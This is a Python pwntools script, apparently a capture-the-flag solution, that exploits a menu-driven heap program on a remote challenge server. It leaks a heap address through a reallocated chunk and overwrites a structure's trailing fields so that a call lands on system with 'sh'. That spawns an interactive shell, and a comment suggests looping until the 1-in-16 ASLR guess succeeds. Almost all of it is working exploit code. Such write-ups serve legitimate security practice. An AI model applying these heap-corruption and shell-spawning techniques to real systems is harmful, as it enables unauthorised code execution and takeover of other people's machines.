from pwn import *
def add(sz, content, price):
    """Drive menu option 1 on the module-level ``io`` tube.

    Sends ``sz`` and ``price`` as decimal text after their prompts and
    ``content`` raw after ``Content: ``. When ``content`` is shorter than
    ``sz`` a trailing newline is appended (presumably so the remote read
    stops early — the binary is not visible here).
    """
    body = content if len(content) >= sz else content + b"\n"
    io.sendlineafter(b"> ", b"1")
    io.sendlineafter(b"Length: ", str(sz).encode())
    # Raw send: the content is length-bounded on the remote side, not line-bounded.
    io.sendafter(b"Content: ", body)
    io.sendlineafter(b"Price: ", str(price).encode())
def peak():
    """Select menu option 2 on the module-level ``io`` tube (name kept as-is; likely "peek")."""
    choice = b"2"
    io.sendlineafter(b"> ", choice)
def pop():
    """Select menu option 3 on the module-level ``io`` tube."""
    choice = b"3"
    io.sendlineafter(b"> ", choice)
def free():
    """Select menu option 4 on the module-level ``io`` tube."""
    choice = b"4"
    io.sendlineafter(b"> ", choice)
MAX_NODES = 64
# 64 eight-byte slots plus two trailing eight-byte fields; the payload below
# writes exactly those two trailing offsets (MAX_NODES * 8 and MAX_NODES * 8 + 8).
TREE_SIZE = MAX_NODES * 8 + 8 + 8
# context.log_level = "debug"
context.terminal = ["tmux", "splitw", "-h"]  # only used by the commented-out gdb.debug path
context.arch = "amd64"
# Needs a local copy of the target binary; only elf.plt is read from it below.
elf = ELF("./main")
# io = process("./main")
# io = gdb.debug("./main", "c", aslr=False)
# Script is a pure network harness: every interaction below goes through this tube.
io = remote("ictf2.maple3142.net", 1225)
free()
add(TREE_SIZE, b"peko", 0)
peak()
io.recvuntil(b"Content: ")
# The free()/add()/peak() round trip echoes 6 bytes back in the Content field;
# they are parsed as a little-endian address (presumably left over in the
# reallocated chunk — a memory-disclosure primitive; confirm against the binary).
present_addr = int.from_bytes(io.recvn(6), "little")
print(f"{present_addr = :#x}")  # f-string "=" specifier requires Python 3.8+
add(2, b"sh", 0)
# NOTE(review): the 0x20 + 0x20 offset is an assumption about the remote heap layout — confirm.
sh_addr = present_addr + 0x20 + 0x20
print(f"{sh_addr = :#x}")
system = elf.plt["system"]  # PLT stub, so it is relative to the image base
print(f"{system = :#x}")
payload = flat(
    {
        0: sh_addr,
        MAX_NODES * 8: 10,
        MAX_NODES * 8 + 8: system + 0x4000,  # 1/16 success, 0x4000 is for aslr off
    }
)[:-6]
# `assert` is dropped under `python -O`; a plain length check with `raise` would not be.
assert len(payload) == TREE_SIZE - 6
free()
add(TREE_SIZE - 6, payload, 0)
pop()
io.interactive()
# while true; do python solve.py; done